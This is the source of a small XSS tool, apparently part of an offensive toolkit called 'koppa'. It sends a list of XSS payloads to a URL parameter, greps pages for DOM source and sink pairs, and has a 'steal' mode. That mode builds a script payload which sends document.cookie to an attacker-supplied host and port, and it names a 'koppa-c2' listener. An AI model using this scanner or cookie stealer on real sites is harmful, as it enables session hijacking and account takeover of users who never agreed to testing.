# koppa-xss v1.0 — XSS scanner
# Usage: koppa run koppa-xss <url> [param] [reflected|dom|steal <lhost> <lport>]

import http, fuzz, encode, log, report, str

let PAYLOADS = [
    "<script>alert(1)</script>",
    "<img src=x onerror=alert(1)>",
    "\"><script>alert(1)</script>",
    "<svg onload=alert(1)>",
    "<details open ontoggle=alert(1)>"
]
let DOM_SOURCES = ["document.URL", "location.hash", "location.search"]
let DOM_SINKS   = ["innerHTML", "document.write", "eval("]

fn cmd_reflected(url, param) {
    log.info("===== Reflected XSS: {url} [{param}] =====")
    let findings = []
    for pay in PAYLOADS {
        let enc  = encode.url_encode(pay)
        let resp = http.get("{url}?{param}={enc}")
        let body = resp.body
        let has_xss = str.contains(body, pay)
        if has_xss {
            log.success("[+] Reflected XSS! Payload: {pay}")
            findings.push(report.finding("Reflected XSS", "High", "Param: {param}"))
        }
    }
    if findings.len == 0 { log.warn("[-] No reflected XSS found") }
    return findings
}

fn cmd_dom(url) {
    log.info("===== DOM XSS Analysis: {url} =====")
    let resp = http.get(url)
    let src  = resp.body
    for source in DOM_SOURCES {
        for sink in DOM_SINKS {
            let has_src  = str.contains(src, source)
            let has_sink = str.contains(src, sink)
            if has_src and has_sink {
                log.success("[+] Potential DOM XSS: {source} -> {sink}")
            }
        }
    }
}

fn cmd_stealer(lhost, lport) {
    log.info("===== Cookie Stealer Payload =====")
    let pay = "<script>new Image().src='http://{lhost}:{lport}/?c='+document.cookie</script>"
    log.success("[+] Payload: {pay}")
    log.info("    Listener: koppa-c2 {lhost} {lport}")
    return pay
}

fn run_xss(url, param, mode) {
    if mode == "reflected" or not mode { cmd_reflected(url, param) }
    if mode == "dom"   { cmd_dom(url) }
    if mode == "steal" { cmd_stealer(__args__[3], __args__[4]) }
    log.success("XSS scan complete!")
}

fn main() {
    let url   = __args__[0]
    let param = __args__[1]
    let mode  = __args__[2]
    log.info("===== KOPPA XSS Scanner v1.0 =====")
    if url {
        run_xss(url, param, mode)
    }
    if not url {
        log.warn("Usage: koppa run koppa-xss <url> [param] [reflected|dom|steal <lhost> <lport>]")
    }
}
